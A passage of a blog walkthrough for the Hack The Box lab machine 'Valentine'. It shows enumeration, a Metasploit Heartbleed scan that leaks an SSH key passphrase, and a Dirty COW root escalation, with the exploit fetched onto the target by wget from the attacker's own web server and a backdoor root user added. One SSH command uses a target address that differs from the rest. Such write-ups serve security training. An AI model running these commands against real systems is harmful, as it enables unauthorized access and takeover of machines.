We use <code>nmap -sV -script=ssl-heartbleed 10.10.10.79<\/code> to validate it is indeed vulnerable to heartbleed.<\/p>\n<p>Checking for cookies on this page shows us nothing here so we move on.<\/p>\n<p>Next to gobuster for more pages to go to:<br \/>\n<code><br \/>\nsudo apt-get install gobuster<br \/>\ngobuster -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/10.10.10.79\/ -x php,html,txt -s 200,204,301,302,307,403 -t 100 | tee gobuster_valentine<br \/>\n<\/code><\/p>\n<p>As a result, we see \/dev and \/encode and \/decode as possible sites we can check out.<\/p>\n<p>We go to \/dev to find a hype_key, which if decoded with hex, gives us a RSA key and some notes from the dev that say:<\/p>\n<p><code>To do:<br \/>\n1) Coffee.<br \/>\n2) Research.<br \/>\n3) Fix decoder\/encoder before going live.<br \/>\n4) Make sure encoding\/decoding is only done client-side.<br \/>\n5) Don't use the decoder\/encoder until any of this is done.<br \/>\n6) Find a better way to take notes.<\/code><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-48\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/ss-1024x576.png\" alt=\"\" width=\"648\" height=\"365\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/ss-1024x576.png 1024w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/ss-600x338.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/ss-300x169.png 300w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/ss-768x432.png 768w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/ss.png 1920w\" sizes=\"auto, (max-width: 648px) 100vw, 648px\" \/><\/p>\n<p>We recommend you use <a href=\"https:\/\/gchq.github.io\/CyberChef\/\">cyberchef<\/a> to decode from hex to txt for the hype_key<\/p>\n<p>We save the RSA key for now, and go on to enumerate \/encode and \/decode (which doesn&#8217;t give us much by looking at cookies, script, etc). Looks like just a script to encode and decode from base64..<\/p>\n<p>OK I think it&#8217;s time to run heartbleed. We run the following commands to set the scan up:<\/p>\n<p><code>msfconsole<br \/>\nmsf &gt; use auxiliary\/scanner\/ssl\/openssl_heartbleed<br \/>\nmsf auxiliary(openssl_heartbleed) &gt; set RHOSTS 10.10.10.79<br \/>\nRHOSTS =&gt; 10.10.10.79<br \/>\nmsf auxiliary(openssl_heartbleed) &gt; set RPORT 443<br \/>\nRPORT =&gt; 443<br \/>\nmsf auxiliary(openssl_heartbleed) &gt; set VERBOSE true<br \/>\nVERBOSE =&gt; true<br \/>\nmsf auxiliary(openssl_heartbleed) &gt; run<br \/>\n<\/code><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-52\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/heartbl.png\" alt=\"\" width=\"1429\" height=\"704\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/heartbl.png 1429w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/heartbl-600x296.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/heartbl-300x148.png 300w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/heartbl-768x378.png 768w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/heartbl-1024x504.png 1024w\" sizes=\"auto, (max-width: 1429px) 100vw, 1429px\" \/><\/p>\n<p>After running a few times, we get the string:<br \/>\ntext=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==GoB<\/p>\n<p>Note: if you keep running and don&#8217;t see this, it may be worth resetting the machine and trying again.<\/p>\n<p>after decoding from base64 using cyberchef, this looks like it&#8217;s saying &#8220;heartbleedbelievethehype&#8221;<\/p>\n<p>Now I think we have all the info we need to SSH in, since we know port 22 is open.<\/p>\n<p>we try a couple different usernames like.. valentine, bleed, heart, mrb3n, hype, and the last one seems to be correct with this command:<br \/>\n<code>ssh -i hype.txt hype@10.10.10.78<\/code><\/p>\n<p>Note that hype.txt is the decoded RSA key we got from earlier.<\/p>\n<p>It&#8217;ll ask for our passphrase and use heartbleedbelievethehype to get in.<\/p>\n<p>cat user.txt to get the flag! now to move onto root..<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-53\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/user.png\" alt=\"\" width=\"739\" height=\"491\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/user.png 739w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/user-600x399.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/user-300x199.png 300w\" sizes=\"auto, (max-width: 739px) 100vw, 739px\" \/><\/p>\n<p>we type uname -a and google for exploits to see that this computer is vulnerable to the dirty cow exploit as outlined <a href=\"https:\/\/www.exploit-db.com\/exploits\/40839\">here<\/a>.<\/p>\n<p>We download that, put that into our \/www folder, and execute<\/p>\n<p><code>python -m SimpleHTTPServer 80<\/code><\/p>\n<p>now we go onto the victim machine and type the following to download the exploit:<\/p>\n<p><code>wget 10.10.15.169\/dirty.c<\/code><\/p>\n<p>we type the following two commands to run the exploit and add a user &#8220;firefart&#8221; with password &#8220;teehee123&#8221;<br \/>\n<code>gcc -pthread dirty.c -o dirty -lcrypt<br \/>\n.\/dirty teehee123<\/code><\/p>\n<p>now we just type <code>su firefart<\/code> from hype&#8217;s command line<\/p>\n<p>we now just need to type two more lines of code to get around the error about &#8220;su must be run from a terminal&#8221;<br \/>\n<code>echo \"import pty; pty.spawn('\/bin\/bash')\" > \/tmp\/asdf.py<br \/>\npython \/tmp\/asdf.py<\/code><\/p>\n<p>try <code>su firefart<\/code> again, type the password teehee123, now we cat root.txt and we have the final flag!<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/root.png\" alt=\"\" width=\"735\" height=\"487\" class=\"alignnone size-full wp-image-55\" srcset=\"https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/root.png 735w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/root-600x398.png 600w, https:\/\/zineausa.com\/blog\/wp-content\/uploads\/2018\/07\/root-300x199.png 300w\" sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/p>\n<p>You have root!
